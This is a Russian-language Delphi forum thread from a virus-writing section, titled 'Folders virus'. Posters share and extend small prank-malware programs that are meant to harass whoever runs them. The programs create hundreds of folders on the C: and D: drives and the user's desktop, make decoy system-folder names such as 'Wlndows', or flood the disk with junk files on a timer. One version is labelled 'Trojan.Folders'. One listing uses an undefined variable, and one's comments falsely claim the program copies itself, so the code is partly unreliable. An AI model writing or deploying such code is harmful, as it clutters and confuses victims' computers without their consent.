Вторник, 01.12.2020, 08:17 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » Folders вирус (Virus)
Folders вирус
dolphinДата: Суббота, 02.08.2008, 10:57 | Сообщение # 1
Администратор
Сообщений: 906
Статус: Offline
Code
program Folders;

uses
   SysUtils;
var
x:LongInt;
begin
for x:=1 to 150 do begin
CreateDir('C:\New Folder'+IntToStr(x));
end;
end.
 
kazin8Дата: Суббота, 11.07.2009, 10:37 | Сообщение # 2
Группа: Удаленные



извращение)))))
 
AD0Дата: Понедельник, 13.07.2009, 08:32 | Сообщение # 3
Группа: Удаленные



XD а лучше плюсовать циферки к системным папкам=) ваще лол будет, берем параметр стринг и плюсуем рэдомное число....вот у чела голова будет болеть....
 
AD0Дата: Понедельник, 13.07.2009, 20:48 | Сообщение # 4
Группа: Удаленные



Code

{modificed by AD0}
program Folders;

uses
    SysUtils;
var
x1,x2,x3,x4:string;
x:LongInt;
begin
x1:='Program Files';
x2:='Windows';
x3:='Wlndows';
x4:='Program Flies';
for x:=1 to 150 do  
begin
CreateDir('C:\' + x1 + IntToStr(x));
CreateDir('C:\' + x2 + IntToStr(x));
CreateDir('C:\' + x3 + IntToStr(x));
CreateDir('C:\' + x5 + IntToStr(x));
{и пусть ебет себе моск}
end;
end.
 
AD0Дата: Пятница, 24.07.2009, 12:27 | Сообщение # 5
Группа: Удаленные



пост казина
Quote (kazin8)
извращение)))))

happy biggrin tongue
 
Marra_KeshДата: Суббота, 30.01.2010, 09:10 | Сообщение # 6
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
Может для многих этот код не нова:
procedure TForm1.Timer1Timer(Sender: TObject);
var i:LongInt;
begin
i:=random(999999999);
memo1.lines.clear;
memo1.lines.strings[0]:=('Marra_Kesh ' +
(IntToStr(i)));
Memo1.lines.SaveToFile('C:\'+IntToStr(i)+'.txt');
end;
И если на таймере интервал поставить на 50, то на компе можно создать приличное количество мусора


Заведующий палатой #6
 
JawДата: Суббота, 30.01.2010, 18:35 | Сообщение # 7
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
Jaw edition:

Code

program Project1;
uses
Windows, SysUtils;

var
x:integer;
function GetUserFromWindows: string;
var
    UserName : string;
    UserNameLen : Dword;
begin
    UserNameLen := 255;
    SetLength(userName, UserNameLen);
    if GetUserName(PChar(UserName), UserNameLen) then
      Result := Copy(UserName,1,UserNameLen - 1)
    else
Result := 'Unknown';
end;
begin
for x:=0 to 1000 do begin
CreateDir('C:\Documents and Settings\'+GetUserFromWindows+'\Рабочий стол\Folder'+IntToStr(x));
end;
end.

P.S:...если юзер не заходит на С::)

Сообщение отредактировал Jaw - Суббота, 30.01.2010, 18:36
 
cool1Дата: Воскресенье, 19.09.2010, 15:58 | Сообщение # 8
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
Quote
program Trojan.Folders;
//©2010 DelfCode.ru
//VIRUS BY DOLPHIN FEAT COOL AND JAW
uses
Windows, SysUtils;

var
x:integer;
function GetUserFromWindows: string;
var
UserName : string;
UserNameLen : Dword;
begin
UserNameLen := 255;
SetLength(userName, UserNameLen);
if GetUserName(PChar(UserName), UserNameLen) then
Result := Copy(UserName,1,UserNameLen - 1)
else
Result := 'Unknown';
end;
begin
for x:=0 to 150 do begin //150 - количество папок
CreateDir('C:\Documents and Settings\'+GetUserFromWindows+'\Рабочий стол\delfcode.ru'+IntToStr(x)); //Копируемся на рабочий стол
CreateDir('C:\delfcode.ru'+IntToStr(x)); //Копируемся на диск с
CreateDir('D:\delfcode.ru'+IntToStr(x)); //Копируемся на диск д
end;
end.


добавил пару строк



За помощь ставьте +!


Сообщение отредактировал cool1 - Воскресенье, 19.09.2010, 15:59
 
delphicode » Delphi » Вирусология Delphi » Folders вирус (Virus)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2020 Хостинг от uCoz